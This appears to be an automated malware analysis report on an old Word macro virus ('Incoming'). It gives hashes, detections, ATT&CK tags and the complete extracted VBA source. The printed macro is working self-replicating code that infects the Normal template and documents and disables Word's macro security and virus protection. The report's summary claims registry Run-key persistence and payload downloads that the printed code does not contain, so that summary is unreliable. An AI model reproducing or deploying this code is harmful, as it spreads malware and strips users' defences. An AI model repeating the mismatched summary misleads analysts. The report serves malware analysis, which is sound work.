Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a379d8d74845c888…

MALICIOUS

Office (OLE)

41.0 KB Created: 1999-09-16 05:12:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 6d9c915a5cda3020a36155c450be06b0 SHA-1: 69fc6cf26da2a5914ec5f81b683247cae98f234a SHA-256: a379d8d74845c888c75a60327787f35781c7f400c8e2068b96464c8f653eec7f
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing VBA macros, as indicated by multiple heuristic firings including ClamAV detections for 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Cash-1'. The 'Document_Open' macro attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy. The macro also manipulates Office security settings to facilitate its execution and potentially download additional payloads, though the full extent is truncated. The document body presents a benign-looking code snippet to lure the user into enabling macros.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1894 bytes
SHA-256: 5572a85d807a0d5acbcd3a21e77530da2c6031288cde963499730423892e918d
Detection
ClamAV: Doc.Trojan.Cash-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Incoming"
Attribute VB_Base = "1Normal.Incoming"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
 On Error Resume Next
 Set a = NormalTemplate.VBProject.VBComponents(1): Set ab = a.CodeModule
 yup = Word.ActiveDocument.Characters.Count: s = "'" + Str(yup)
 ab.replaceline 27, s
End Sub
Private Sub Document_Close()
 On Error Resume Next
 If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then: CommandBars("Macro").Controls("Security...").Enabled = 0: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
 Options.ConfirmConversions = 0
 Options.SaveNormalPrompt = 0
 Options.VirusProtection = 0
 CommandBars("Tools").Controls("Macro").Enabled = 0
 Set d = New DataObject
 Set a = NormalTemplate.VBProject.VBComponents(1): Set ab = a.CodeModule
 Set c = ActiveDocument.VBProject.VBComponents(1): Set cd = c.CodeModule
 d.SetText Incoming.VBProject.VBComponents(1).CodeModule.lines(1, Incoming.VBProject.VBComponents(1).CodeModule.countoflines)
 If Not a.Name = "Incoming" Then
   ab.deletelines 1, ab.countoflines: ab.insertlines 1, d.GetText: a.Name = "Incoming"
  ElseIf Not c.Name = "Incoming" Then
   cd.deletelines 1, cd.countoflines: cd.insertlines 1, d.GetText: c.Name = "Incoming"
  If Day(Now) = 16 Then: MsgBox "Chaos," & vbCr & "Panic," & vbCr & "Disorder," & vbCr & "My work here is done!!", vbOKOnly, "Incoming"
 End If
 yup = Word.ActiveDocument.Characters.Count: s2 = "'" + Str(yup)
 If ab.lines(27, 1) = s2 Then: ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
' 1236
' Word 97/2K Incoming [ Psyclone X /DVC ]